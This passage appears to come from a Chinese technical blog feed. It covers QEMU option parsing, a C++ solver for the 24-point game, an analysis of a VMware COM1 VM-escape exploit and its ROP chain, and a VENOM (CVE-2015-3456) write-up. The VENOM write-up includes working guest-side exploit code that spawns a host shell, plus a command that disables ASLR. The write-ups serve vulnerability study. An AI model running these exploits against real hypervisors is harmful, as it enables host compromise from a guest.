qemu_add_drive_opts(&qemu_common_drive_opts);
qemu_add_drive_opts(&qemu_drive_opts);
qemu_add_opts(&qemu_chardev_opts);
qemu_add_opts(&qemu_device_opts);
qemu_add_opts(&qemu_netdev_opts);
qemu_add_opts(&qemu_net_opts);
qemu_add_opts(&qemu_rtc_opts);
qemu_add_opts(&qemu_global_opts);
qemu_add_opts(&qemu_mon_opts);
qemu_add_opts(&qemu_trace_opts);
qemu_add_opts(&qemu_option_rom_opts);
qemu_add_opts(&qemu_machine_opts);
qemu_add_opts(&qemu_mem_opts);
qemu_add_opts(&qemu_smp_opts);
qemu_add_opts(&qemu_boot_opts);
qemu_add_opts(&qemu_sandbox_opts);
qemu_add_opts(&qemu_add_fd_opts);
qemu_add_opts(&qemu_object_opts);
qemu_add_opts(&qemu_tpmdev_opts);
qemu_add_opts(&qemu_realtime_opts);
qemu_add_opts(&qemu_msg_opts);
qemu_add_opts(&qemu_name_opts);
qemu_add_opts(&qemu_numa_opts);
qemu_add_opts(&qemu_icount_opts);
qemu_add_opts(&qemu_semihosting_config_opts);
qemu_add_opts(&qemu_fw_cfg_opts);
</code></pre></div></div>
<p>每个QemuOptsList存储了大选项支持的所有小选项,比如</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList qemu_realtime_opts = {
.name = "realtime",
.head = QTAILQ_HEAD_INITIALIZER(qemu_realtime_opts.head),
.desc = {
{
.name = "mlock",
.type = QEMU_OPT_BOOL,
},
{ /* end of list */ }
},
};
</code></pre></div></div>
<p>-realtime只支持一个值为bool的子选项,即只能由-realtime mlock=on/off。
但是像-device这种选项就没有这么死板了,-device并没有规定必须的选项,因为设备有无数多种,不可能规定得过来,解析就是按照“,”或者“=”来解析的。
每个子选项是一个的结构是QemuOpt,定义如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpt {
char *name;
char *str;
const QemuOptDesc *desc;
union {
bool boolean;
uint64_t uint;
} value;
QemuOpts *opts;
QTAILQ_ENTRY(QemuOpt) next;
}
</code></pre></div></div>
<p>name表示子选项的字符串表示,str表示对应的值</p>
<p>QemuOptsList并不是和QemuOpt直接联系,中间还需要有一层QemuOpts,因为比如上面的可以指定两个-device,这个时候他们都在QemuOptsList的链表上,但是是两个QemuOpts,每个QemuOpts又有自己的QemuOpt链表。QemuOpts结构如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpts {
char *id;
QemuOptsList *list;
Location loc;
QTAILQ_HEAD(QemuOptHead, QemuOpt) head;
QTAILQ_ENTRY(QemuOpts) next;
};
</code></pre></div></div>
<p>大体结构如下:</p>
<p><img src="/assets/img/qemuoptions/1.PNG" alt="" /></p>
<p>对应本文用的参数,如下(省略了一些参数,比如-m)</p>
<p><img src="/assets/img/qemuoptions/2.PNG" alt="" /></p>
<p>参考:<a href="https://www.ibm.com/developerworks/community/blogs/5144904d-5d75-45ed-9d2b-cf1754ee936a/entry/qemu_2_%25e5%258f%2582%25e6%2595%25b0%25e8%25a7%25a3%25e6%259e%2590?lang=en">QEMU 2: 参数解析</a></p>
<p>IBM的这篇文章不太好理解,后面也有错误</p>
输出24点游戏所有解2015-08-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/25/pointgame
<p>24点游戏,就是选4个数,对其运用加减乘除,得到24,可以使用括号。关于24点游戏的解法,《编程之美》上面说得比较清楚,我这里直接使用第二种解法。这里在合并S集的时候是不应该像书上说的去重的,因为虽然说产生的数一样,但是他们是不同的计算的方式产生的,如果这个时候去重会导致得不出正确的解法个数,正确的去重应该是在最后统计S[15]中24的个数时。下面是运行结果:</p>
<p><img src="/assets/img/pointgame/1.PNG" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <vector>
#include <set>
#include <algorithm>
#include <iterator>
#include <string>
#include <math.h>
using namespace std;
const double threHold = 1E-6;
struct Node
{
double value;
string exp;
Node(double v, string s) :value(v), exp(s){}
friend bool operator < (const Node &node1, const Node &node2)
{
return node1.value < node2.value;
}
};
class PointGameSolver
{
public:
PointGameSolver(initializer_list<double> li) :init(li)
{
S = new multiset<Node>[static_cast<int>(pow(2, init.size()))];
}
int getResult(set<string>& ans)
{
ans.clear();
calc();
return check(ans);
}
~PointGameSolver()
{
delete[] S;
}
private:
int check(set<string>& result);
multiset<Node> setS(int i);
multiset<Node> getUnion(multiset<Node> a, multiset<Node> b);
multiset<Node> fork(multiset<Node> a, multiset<Node> b);
void calc();
multiset<Node> *S;
vector<double> init;
};
int PointGameSolver::check(set<string>& result)
{
int count = 0;
multiset<Node> ans = S[static_cast<int>(pow(2, init.size()) - 1)];
for (auto it = ans.begin(); it != ans.end(); ++it)
{
if ((it->value - 0) > threHold && fabs(it->value - 24) < threHold)
{
count++;
result.insert(it->exp);
}
}
return result.size();
}
multiset<Node> PointGameSolver::setS(int i)
{
if (!S[i].empty())
return S[i];
for (int x = 1; x < i; ++x)
{
if ((x & i) == x)
S[i] = getUnion(S[i], fork(setS(x), setS(i - x)));
}
return S[i];
}
multiset<Node> PointGameSolver::getUnion(multiset<Node> a, multiset<Node> b)
{
multiset<Node> result;
copy(a.begin(), a.end(), inserter(result, result.begin()));
copy(b.begin(), b.end(), inserter(result, result.begin()));
return result;
}
multiset<Node> PointGameSolver::fork(multiset<Node> a, multiset<Node> b)
{
if (a.empty())
return b;
if (b.empty())
return a;
multiset<Node> result;
for (auto ita = a.begin(); ita != a.end(); ++ita)
{
for (auto itb = b.begin(); itb != b.end(); ++itb)
{
result.insert(Node(ita->value + itb->value, "(" + ita->exp + "+" + itb->exp + ")"));
result.insert(Node(ita->value * itb->value, "(" + ita->exp + "*" + itb->exp + ")"));
result.insert(Node(ita->value - itb->value, "(" + ita->exp + "-" + itb->exp + ")"));
result.insert(Node(itb->value - ita->value, "(" + itb->exp + "-" + ita->exp + ")"));
if (!((fabs(ita->value - 0) < threHold)))
{
result.insert(Node(ita->value / itb->value, "(" + ita->exp + "/" + itb->exp + ")"));
}
if (!((fabs(itb->value - 0) < threHold)))
{
result.insert(Node(itb->value / ita->value, "(" + itb->exp + "/" + ita->exp + ")"));
}
}
}
return result;
}
void PointGameSolver::calc()
{
size_t n = init.size();
for (size_t i = 0; i < n; ++i)
{
S[static_cast<int>(pow(2, i))].insert(Node(init[i], to_string((int)init[i])));
}
for (size_t i = 1; i < pow(2, n); ++i)
{
S[i] = setS(i);
}
}
bool isValid(int *a, int n)
{
for (int i = 0; i < n; ++i)
{
if (a[i] < 1 || a[i] > 10)
return false;
}
return true;
}
int _tmain(int argc, _TCHAR* argv[])
{
int data[4];
while (1)
{
cout << "请输入4个数(1-10,空格隔开):";
int i = 0;
while (cin >> data[i++])
{
if (i == 4)
break;
}
if (cin && isValid(data, 4))
{
PointGameSolver pgs({ (double)data[0], (double)data[1], (double)data[2], (double)data[3] });
set<string> ans;
int count = pgs.getResult(ans);
if (!count)
{
cout << "no solution\n";
}
else
{
cout << "total solutions :" << count << endl;
for_each(ans.begin(), ans.end(), [](const string &s) {cout << s << endl; });
}
}
else
cout << "invalid input \n";
cout << "\n";
cout << "continue?(y/n):";
if (!cin)
cin.clear();
cin.ignore(numeric_limits<streamsize>::max(), '\n');
string str;
cin >> str;
if (str != "Y" && str != "y")
break;
}
return 0;
}
</code></pre></div></div>
<p>竟然有人看到了文末,那就扯点别的。这是UCloud的面试题,昨晚接到UCloud面试官的电话,简单说了下他们是做网络虚拟化的,问有没有兴趣。随意聊了一下,然后就在我准备接受一番血虐的时候,他直接就给我整个这个题,太直接了好嘛,有一种dota里面的“生死看淡,不服就干”的味道。然后我当然就查资料了,发现竟然是编程之美上面的,然后看了下思路,顺着书上的框架写好代码,完工之后才发现还要输出所有解。想了一会,之前想到甚至用tuple来保存表达式,后来想到还是直接string简单点,把multiset<double>,换成了multiset<Node>了,Node里面包括了值和产生此值的表达式,看起来也还算不错。</Node></double></p>
VMware COM1虚拟机逃逸漏洞分析2015-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/04/vmware-com1-escap
<p>本文是对谷歌的文章<a href="https://docs.google.com/document/d/1sIYgqrytPK-CFWfqDntraA_Fwi2Ov-YBgMtl5hdrYd4/preview?sle=true">Escaping VMware Workstation through COM1</a>中提及的漏洞利用的分析。</p>
<p>##1. 背景简介</p>
<p>VMware为了方便,提供在虚拟机中打印文件并保存在宿主机中,默认将Microsoft XPS Document Writer作为打印机。COM1端口用于和Host的vprintproxy.exe进行交互。当Guest打印文件时,会将EMFSPOOL和EMF文件交给vprintproxy.exe进行处理,由于vprintproxy.exe的TPView.dll存在一个缓冲区漏洞,畸形构造的打印文件会导致vprintproxy.exe被控制,进而造成宿主机任意代码执行。</p>
<p>##2. 漏洞复现</p>
<p>环境:host win8.1, guest win7,VMWare 11.1.0 build-2496824,python版本为3.4.3。根据文档和分析,基本上只要TPView.dll为8.8.856.1版和iconv.dll为1.9.0.1版即可复现该漏洞。</p>
<p>工具:ida 6.5,x64dbg(这次用的是其32位版本x32dbg)</p>
<p>首先,看看正常的功能是怎么样的,在虚拟机中打开一个正常文件,选择下图所示的打印机,即可将虚拟机中的文档打印到宿主机中。</p>
<p><img src="/assets/img/vmwarecom1/1.PNG" alt="" /></p>
<p>在虚拟机中执行python.exe poc(<a href="/assets/file/vmwarecom1/poc">poc</a>为谷歌文末给的代码),看到vprintproxy.exe成功创建了计算器进程,下图所示。</p>
<p><img src="/assets/img/vmwarecom1/2.PNG" alt="" /></p>
<p>##3. 总体分析</p>
<p>总体流程图如下图所示。</p>
<p><img src="/assets/img/vmwarecom1/arch.PNG" alt="" /></p>
<p>谷歌给的exp中与漏洞利用有关的主要是overflow部分和SHELLCODE部分。overflow负责淹没缓冲区以及布置各个gadget,大致分为2个部分,按照运行的流程分别叫做第一段和第二段。SHELLCODE则完成实际功能,可以是任何能够在win 8.1运行的shellcode。</p>
<p>第一段的首先4个字节(图中first eip)是覆盖ret控制eip的第一步,第一段的主要工作就是在0x1010ff00放置好VirtualAlloc - edi的差值,为0x00078c48,方便以后动态得到VirtualAlloc的地址,这里在漏洞触发点曝出的edi的值可以说是非常重要的。第一段还有一个作用就是将栈顶抬高到overflow前四个字节,然后去执行第二段。这里分两段的原因是第一段中由于触发漏洞需要有几个特殊的点布置特殊的数据,这些会跟first eip及之后的几个gadget的布局冲突。</p>
<p>第二段的主要工作就是动态得到VirtualAlloc的地址,分配0x10000个字节的可执行的内存区域,然后在0x40000000的前0xC个字节处布置特殊的指令,然后跳到0x40000000处执行。</p>
<p>0x40000000处将已经读入内存的SHELLCODE以及其他数据拷贝到0x40000010处开始的地址处,然后跳到0x40000200处执行,0x40000200经过一段nop指令后顺利滑到了SHELLCODE的地方。</p>
<p>由于整个进程地址空间实际只有1个iconv.dll为被随机化加载,如图4所示,可以利用的gadget非常不丰富,ROP的构造展现出了特别精妙的艺术。</p>
<p><img src="/assets/img/vmwarecom1/3.PNG" alt="" /></p>
<p>##4. 详细分析</p>
<p>###4.1 覆盖返回地址</p>
<p>在谷歌的文档中,我们知道溢出的位置是在距离TPView.dll加载基址0x48788处,根据实际加载的基址,我们找到溢出的位置在0x03208788处,x32dbg中下图所示。</p>
<p><img src="/assets/img/vmwarecom1/4.PNG" alt="" /></p>
<p>经过分析,在0x03208797的处的call会每次拷贝2个字节到esp+48(eip在0x0320879时)的位置,图6显示了已经拷贝了8个字节的情况(由于栈随机化,实际情况以dbg里面的为准)。</p>
<p><img src="/assets/img/vmwarecom1/5.PNG" alt="" /></p>
<p>对应的是exp中的overflow的开始部分,拷贝次数在ebx中,为0xAC,也就是理论上可以拷贝的字节为0xAC*2=0x158个字节,而拷贝0x4C以上的字节的时候会导致缓冲区溢出,淹没返回地址。直接运行到之后的0x032087ba,此时栈的已经被全部被exp中的overflow覆盖了。继续往下走,在0x03208882处有一个从esp+118读数据到edx,后面会将该数与其加1之后的结果比较作为分支方向(即0x032088a5处),这里必须保证能够跳转成功,所以布局overflow的时候需要在esp+118这个位置放上0x7fffffff。接着往下走,到0x032089f8处,需要从eps+110处读四个字节到edx,在0x03208a01处有向这个edx内存写数据的指令,所以这个地址需要是可写的,这就是exp中的WRITABLE为1010ff00的原因,这是iconv.dll的.idata空间,注意这里edx=0x1010ff00,之后一直没有变过。由于有这两个原因以及之后的控制eip之后的操作,布局无法向常规一样,像流水线一样一直往下走。文章中使用了比较巧妙的办法,先布局shellcode的一部分,然后将栈抬高,接着执行shellcode的第二部分。</p>
<p>###4.2 overflow第二段代码执行</p>
<p>从0x03208adf处ret之后,就到了我们第一个eip处0x1001cae4,这是跳向InterlockedExchange的指令,注意这个点的edi,edi的值与保存VirtualAlloc函数地址的值紧密相关。该exp大量使用InterlockedExchange来布置数据,技巧性相当高。现在控制流程到了0x74ec2520,很容易看出这是在交换[ecx]和eax的数据,eax和ecx分别取自esp+C和esp+8。ecx为0x1010ff00,eax为0xf4,这个0xf4就是从overflow开始到结束的距离,待会会利用这个数据直接将流程控制点到overflow的顶部。紧接着ret,到了0x1001c595,只是将之前的0x1010ff00弹出,接着ret还是0x1001c595,弹出之前的数据。现在eip又到了0x1001cae4,这次交换的数据是eax=0x00078c48和地址ecx=0x1010ff00处的数据,这也是特别巧妙的,可谓是一举两得,eax变成了0xf4作为之后调用_alloca_probe的参数,而0x1010ff00处的值0x00078c48与edi相加之后正好为存有VirtualAlloc函数地址的地址。在这个0x1001cae4返回之后到达0x1001c1e0,这就是_alloca_probe函数的地址,该函数将栈抬高eax字节,此时esp-f4即可到达overflow的前4个字节,由于在0x1001c1fb处,eax和esp交换,所以这时eax的值为老的esp,之后eax的值esp处的值,即overflow的最底部的值0x1001cae4,然后赋给栈顶,此时的栈顶已经在overflow第一段的前四个字节了。到0x1001c201返回ret直接到了0x1001cae4。这时开始执行overflow的第一部分shellcode代码。</p>
<p>###4.3 overflow第一段代码执行</p>
<p>最开始执行由4.2末尾设置在0x1001cae4的代码,也就是InterlockedExchange的指令,这次是将0x10110284的值设为0x1001c594,0x10110284为_io_func的函数地址,这个作用后面叙述。从这个gadget返回之后到了0x1001c94c,将edx的值放入eax之后返回(注意,edx自从被置为1010ff00之后没有变过,所以此时eax为1010ff00)。这个时候到了0x100010b1,在0x100010b4会调用call [100110284],0x100110284地址处的值已经被替换成了0x1001c594,这个gadget什么也没做,接着到了0x1001c594,也只是到达下一个gadget。现在到了0x1000cb5c,这是dec eax,紧接着到达0x10003d43,这个指令add dword ptr ds:[eax+1],edi,正好将0x1010ff00的值设为0x00078c48+edi = 0x032812d8,这个值就是存放的就是存放VirtualAlloc地址的地址,注意这里由于0x10003d94的指令还将栈抬高了0x10个字节,所以现在又ret到了0x1001c594。这里弹出几个之前的布局,到了0x10001116将0x1010fef8弹到了ebp中,0x1001c120将ebp+8即1010ff00处的值放到eax中。之后到了0x10010b1处的gadget,这里调call [10110284],也是弹出之前需要的布局数据。然后到了0x1001c1fc,这个gadget将VirtualAlloc的地址(在eax中)放入[esp],然后ret,根据在stack布置好的参数,就在0x40000000处分配了0x10000大小的空间,并且可执行。接下来又是3次跳到0x1001cae4,这个gadget已经很熟了,这里就是将新开辟的0x40000000的开始0xC个字节放入0x8b24438b和0x0xa4f21470,0x01f3e9。然后跳到0x40000000开始执行。</p>
<p>###4.4 执行SHELLCODE</p>
<p>这0xC个字节是组成4条指令,将内存中的[esi]处的数据复制到0x40000010处,[esi]之中就包括了SHELLCODE部分,之后jmp 0x40000200,进入一段nop滑板之后就执行了SHELLCODE。</p>
<p>##5. 总结</p>
<p>该漏洞有两个地方我认为是难点,第一是EMFSPOOL、EMF和JPEG2000的文件格式,需要构造触发漏洞的poc并不容易。第二是漏洞的利用,由于该漏洞可以使用的gadget来源仅有icov.dll,所以ROP链的构造非常不容易,从第四部分的分析也看出了,overflow被迫分为两段,然后栈的忽而抬升,忽而下降,布局溢出数据需要考虑栈提升的前后两个方面的情况,技巧性特别高。总之我认为这是一个基本完美的利用。
从VENOM和这个漏洞可以看出,虚拟化漏洞(特别是虚拟机逃逸)这种一般都是在跟主机打交道的时候发生的。KVM中,vm exit进入kvm内核处理的过程,以及kvm分发io给qemu的时候应该是发生漏洞的主要场景。由于docker依靠的是linux内核提供的隔离机制,内核出现漏洞,出事的概率特别大。</p>
VENOM漏洞分析与利用2015-06-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/06/26/venom
<p>本文主要是对VENOM漏洞的原理进行分析,并且在关ASLR的情况下利用ret2lib的方式进行了利用。本文实验环境为Ubuntu 12.04 x86,kernel 3.2.57 ,qemu版本为2.2.0-rc1,实验室现成的开发机环境。</p>
<p>##1. 漏洞简介</p>
<p>VENOM,CVE-2015-3456是由CrowdStrike的Jason Geffner发现的存在于QEMU虚拟软驱中的漏洞。由于QEMU的设备模型被KVM、Xen等虚拟化软件广泛使用,影响还是比较大的,攻击者利用该漏洞能够使虚拟机逃逸,在宿主机中执行代码。</p>
<p>##2. 漏洞触发</p>
<p>根据mj提交在<a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">360官方技术Blog</a>上的文章,原始poc可能会对触发有影响,我这里也没成功,就用了文中的poc。(下文有些内容也是从该文中学习的,有些重复只是为了保证本文完整性)运行poc之后,虚拟机进程崩溃。第一版poc及崩溃效果如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 10000000;i++)
outb(0x42,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/1.png" alt="" />
<img src="/assets/img/venom/2.png" alt="" /></p>
<p>eip的值为42424242,猜测eip可以控制。下面结合mj的文章对漏洞做简要分析。</p>
<p>##3. 漏洞分析</p>
<p>如poc中所示,除了iopl调用获得对端口的操作权限以外,qemu都在执行outb指令,这会引发vm exit,陷入内核中,交给kvm模块处理,kvm模块会将该io操作派给qemu处理,大致流程就是这样,代码层面的分析此处略(我个人也不敢说完全懂)。在poc中,都是在向DATA_FIFO端口写数据。在qemu源代码中hw/block/fdc.c文件中:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct {
uint8_t value;
uint8_t mask;
const char* name;
int parameters;
void (*handler)(FDCtrl *fdctrl, int direction);
int direction;
} handlers[] = {
{ FD_CMD_READ, 0x1f, "READ", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_WRITE, 0x3f, "WRITE", 8, fdctrl_start_transfer, FD_DIR_WRITE },
{ FD_CMD_SEEK, 0xff, "SEEK", 2, fdctrl_handle_seek },
{ FD_CMD_SENSE_INTERRUPT_STATUS, 0xff, "SENSE INTERRUPT STATUS", 0, fdctrl_handle_sense_interrupt_status },
{ FD_CMD_RECALIBRATE, 0xff, "RECALIBRATE", 1, fdctrl_handle_recalibrate },
{ FD_CMD_FORMAT_TRACK, 0xbf, "FORMAT TRACK", 5, fdctrl_handle_format_track },
{ FD_CMD_READ_TRACK, 0xbf, "READ TRACK", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_RESTORE, 0xff, "RESTORE", 17, fdctrl_handle_restore }, /* part of READ DELETED DATA */
{ FD_CMD_SAVE, 0xff, "SAVE", 0, fdctrl_handle_save }, /* part of READ DELETED DATA */
{ FD_CMD_READ_DELETED, 0x1f, "READ DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_READ },
{ FD_CMD_SCAN_EQUAL, 0x1f, "SCAN EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANE },
{ FD_CMD_VERIFY, 0x1f, "VERIFY", 8, fdctrl_start_transfer, FD_DIR_VERIFY },
{ FD_CMD_SCAN_LOW_OR_EQUAL, 0x1f, "SCAN LOW OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANL },
{ FD_CMD_SCAN_HIGH_OR_EQUAL, 0x1f, "SCAN HIGH OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANH },
{ FD_CMD_WRITE_DELETED, 0x3f, "WRITE DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_WRITE },
{ FD_CMD_READ_ID, 0xbf, "READ ID", 1, fdctrl_handle_readid },
{ FD_CMD_SPECIFY, 0xff, "SPECIFY", 2, fdctrl_handle_specify },
{ FD_CMD_SENSE_DRIVE_STATUS, 0xff, "SENSE DRIVE STATUS", 1, fdctrl_handle_sense_drive_status },
{ FD_CMD_PERPENDICULAR_MODE, 0xff, "PERPENDICULAR MODE", 1, fdctrl_handle_perpendicular_mode },
{ FD_CMD_CONFIGURE, 0xff, "CONFIGURE", 3, fdctrl_handle_configure },
{ FD_CMD_POWERDOWN_MODE, 0xff, "POWERDOWN MODE", 2, fdctrl_handle_powerdown_mode },
{ FD_CMD_OPTION, 0xff, "OPTION", 1, fdctrl_handle_option },
{ FD_CMD_DRIVE_SPECIFICATION_COMMAND, 0xff, "DRIVE SPECIFICATION COMMAND", 5, fdctrl_handle_drive_specification_command },
{ FD_CMD_RELATIVE_SEEK_OUT, 0xff, "RELATIVE SEEK OUT", 2, fdctrl_handle_relative_seek_out },
{ FD_CMD_FORMAT_AND_WRITE, 0xff, "FORMAT AND WRITE", 10, fdctrl_unimplemented },
{ FD_CMD_RELATIVE_SEEK_IN, 0xff, "RELATIVE SEEK IN", 2, fdctrl_handle_relative_seek_in },
{ FD_CMD_LOCK, 0x7f, "LOCK", 0, fdctrl_handle_lock },
{ FD_CMD_DUMPREG, 0xff, "DUMPREG", 0, fdctrl_handle_dumpreg },
{ FD_CMD_VERSION, 0xff, "VERSION", 0, fdctrl_handle_version },
{ FD_CMD_PART_ID, 0xff, "PART ID", 0, fdctrl_handle_partid },
{ FD_CMD_WRITE, 0x1f, "WRITE (BeOS)", 8, fdctrl_start_transfer, FD_DIR_WRITE }, /* not in specification ; BeOS 4.5 bug */
{ 0, 0, "unknown", 0, fdctrl_unimplemented }, /* default handler */
};
</code></pre></div></div>
<p>与poc有关的FIFO命令为:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FD_CMD_DRIVE_SPECIFICATION_COMMAND = 0x8e
</code></pre></div></div>
<p>另一个42是作为该命令的参数传递给handler的,这里是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fdctrl_handle_drive_specification_command
</code></pre></div></div>
<p>当qemu接到了FIFO命令之后,通过命令ID找到找到handlers数组中位置,然后根据参数个数继续接受参数,将命令ID和参数放到一个buffer中。当参数接受完了之后,调用相应的处理函数。整个FIFO写操作都在fdctrl_write_data函数中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
...
//处理命令
if (fdctrl->data_pos == 0) {
/* Command */
pos = command_to_handler[value & 0xff];
FLOPPY_DPRINTF("%s command\n", handlers[pos].name);
fdctrl->data_len = handlers[pos].parameters + 1;
fdctrl->msr |= FD_MSR_CMDBUSY;
}
//将命令和参数保存在fdctrl->fifo中
fdctrl->fifo[fdctrl->data_pos++] = value;
if (fdctrl->data_pos == fdctrl->data_len) {
/* We now have all parameters
* and will be able to treat the command
*/
if (fdctrl->data_state & FD_STATE_FORMAT) {
fdctrl_format_sector(fdctrl);
return;
}
pos = command_to_handler[fdctrl->fifo[0] & 0xff];
FLOPPY_DPRINTF("treat %s command\n", handlers[pos].name);
(*handlers[pos].handler)(fdctrl, handlers[pos].direction);
}
}
</code></pre></div></div>
<p>当所需的参数收集完了之后,调用对应的处理函数,8e对应的是fdctrl_handle_drive_specification_command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
FDrive *cur_drv = get_cur_drv(fdctrl);
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
/* Command parameters done */
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
fdctrl->fifo[0] = fdctrl->fifo[1];
fdctrl->fifo[2] = 0;
fdctrl->fifo[3] = 0;
fdctrl_set_fifo(fdctrl, 4);
} else {
fdctrl_reset_fifo(fdctrl);
}
} else if (fdctrl->data_len > 7) {
/* ERROR */
fdctrl->fifo[0] = 0x80 |
(cur_drv->head << 2) | GET_CUR_DRV(fdctrl);
fdctrl_set_fifo(fdctrl, 1);
}
}
</code></pre></div></div>
<p>通过控制传入fifo中的数据我们绕过这两个if判断语句,也就不会有fdctrl_set_fifo和fdctrl_reset_fifo的调用,这两个函数正是对fifo缓冲区进行清空和控制是否可写的函数。这样就能够调用outb无限向fifo缓冲区写数据,fifo是通过malloc分配的512字节空间,当超过512就会覆盖其他的数据,造成程序崩溃。</p>
<p>##4. eip定位</p>
<p>一般情况下,进程的堆离代码段是非常远的,并且heap在高地址空间而text在低地址空间,更不可能直接通过溢出堆空间修改eip。该漏洞通过堆溢出覆盖了eip,估计是覆盖了堆中动态分配的某些数据结构,这些数据结构会影响到eip。linux下面没有找到类似Immunity dbg的神器,要么自己写pattern文件定位eip,要么手工。由于实验用的虚拟机没弄网络,自己拷文件进去比较麻烦,就自己手工定位eip了。用二分法定位了20多分钟基本就知道大概1550个字节左右就会触发漏洞。这里有一个问题,导致我最开始以为eip不稳定。每次触发漏洞之后会导致poc被删除,然后我再开启虚拟机运行那个已经没有内容的poc,当然不会触发漏洞了(关于这个问题,后面会再说)。覆盖eip的位置大致定了之后就上gdb了,通过调试,最后确定1516个字节之后的4个字节就是覆盖eip的位置。poc第二版及崩溃后的eip截图如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
for(i = 0;i < 4;i++)
outb(0x43,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/3.png" alt="" /></p>
<p>我们看到进程如期崩溃,eip为43434343,定位精准。</p>
<p>##5. 原理分析</p>
<p>如第四部分所言,单纯的覆盖堆缓冲区是不能直接覆盖到eip的。本部分对覆盖到eip的原因进行分析。
gdb启动qemu进程,设置参数之后开始run,在虚拟机里面运行poc。</p>
<p><img src="/assets/img/venom/4.png" alt="" /></p>
<p>虚拟机如期崩溃,bt显示最后一个函数是在async.c文件里面的aio_bh_poll里面82行。</p>
<p><img src="/assets/img/venom/5.png" alt="" /></p>
<p>aio_bh_poll 82行调用的是bh->cb(bh->opaque);,这条语句调用的是QEMUBH结构体中的保存的一个回调函数,现在情况就比较明了了,QEMUBH内部通过next形成的链表,每个QEMUBH的内存空间通过malloc分配在虚拟机对应的进程堆上面,挨着fdctrl->fifo的一个QEMUBH被覆盖了,导致aio_bh_poll执行里面的callback的时候遇到错误的eip地址。经过分析,大概的图如下:</p>
<p><img src="/assets/img/venom/6.png" alt="" /></p>
<p>在分析该部分的时候,了解了一下,aio的poll是在主线程里面做的,专门处理某种block的IO。</p>
<p>##6. 漏洞利用</p>
<p>知道了漏洞的细节之后,下一步就是利用了。qemu程序非常大,堆里面申请的数据非常多,基本上可以说对加载的payload大小没啥限制。对eip的完全控制和payload几乎没有限制,如果能够过掉ASLR和DEP,相信会是一个非常完美的利用,利用虚拟机进程执行任意代码。第一次写Linux的exp,对linux的ASLR和DEP绕过技术不太熟(Windows也好久不搞了,不过我记得方法是不少的),在网上找了好久Linux进行ROP的文章,但是都太老了,在所有模块加载基址都随机化的情况下,感觉需要针对具体漏洞的特定得到模块或者某个函数的地址,才能进一步走下去。于是,我就只能关掉了ASLR。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code></pre></div></div>
<p>暂时不考虑过ASLR,就简单利用ret2lib,通过system去执行/bin/sh。之前考虑怎么布置参数,本来想着可能还要转换栈的,后来灵光一下,发现覆盖的那个callback后面就是其参数。太巧了,只需要找到/bin/sh的地址布置在eip之后就可以了。下图为寻找system函数和”/bin/sh”字符串的过程。</p>
<p><img src="/assets/img/venom/7.png" alt="" /></p>
<p>下面是poc的第三版</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
outb(0x10,0x3f5);
outb(0xce,0x3f5);
outb(0xe6,0x3f5);
outb(0xb7,0x3f5);
outb(0xb8,0x3f5);
outb(0x50,0x3f5);
outb(0xe1,0x3f5);
outb(0xb7,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p>最后的poc效果如下,先在虚拟机中运行poc,然后宿主机中对应的qemu进程开启了/bin/sh。</p>
<p><img src="/assets/img/venom/8.png" alt="" /></p>
<p><img src="/assets/img/venom/9.png" alt="" /></p>
<p>##7. 遗留问题</p>
<ol>
